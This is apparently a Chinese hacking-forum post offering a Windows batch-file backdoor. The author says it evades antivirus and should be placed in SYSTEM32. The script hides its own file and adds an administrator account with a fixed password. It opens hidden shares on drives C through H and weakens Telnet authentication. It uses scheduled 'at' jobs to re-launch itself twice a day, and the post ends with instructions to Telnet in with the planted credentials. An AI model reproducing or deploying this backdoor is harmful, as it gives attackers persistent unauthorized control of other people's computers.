代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下：
    @echo off
    @attrib +s + r xyt.bat
    @net user xyt hacker /add
    @net localgroup administrators xyt /add
    @net share c$=c:
    @net share d$=d:
    @net share e$=e:
    @net share f$=f:
    @net share g$=g:
    @net share h$=h:
    @tlntadmn config sec = -ntlm

   @net  stop schedule
    @net start Schedule
    @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
    @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
    @at 11:05 c:\WINNT\SYSTEM32\xyt.bat
    @at 23:05 c:\WINNT\SYSTEM32\xyt.bat
    @net stop telnet  
    @net start telnet
    @exit

   这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，呵呵~~
    运行后TELNET IP上去，用户名为xyt，密码为hacker。 　var tagarray = ['逆向工程','IIS','属主','猎头','招聘','Oracle','机器狗','感染','驱动编程','百度','隐藏驱动','PeakSharp','手机号','数据恢复','Ghost','DDoS','内核编程','Microsoft','Overflow','WPS','Office','Buffer','Serv-U','DataExplorer','EasyRecovery','飘絮'];var tagencarray = ['%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B','IIS','%E5%B1%9E%E4%B8%BB','%E7%8C%8E%E5%A4%B4','%E6%8B%9B%E8%81%98','Oracle','%E6%9C%BA%E5%99%A8%E7%8B%97','%E6%84%9F%E6%9F%93','%E9%A9%B1%E5%8A%A8%E7%BC%96%E7%A8%8B','%E7%99%BE%E5%BA%A6','%E9%9A%90%E8%97%8F%E9%A9%B1%E5%8A%A8','PeakSharp','%E6%89%8B%E6%9C%BA%E5%8F%B7','%E6%95%B0%E6%8D%AE%E6%81%A2%E5%A4%8D','Ghost','DDoS','%E5%86%85%E6%A0%B8%E7%BC%96%E7%A8%8B','Microsoft','Overflow','WPS','Office','Buffer','Serv-U','DataExplorer','EasyRecovery','%E9%A3%98%E7%B5%AE'];parsetag();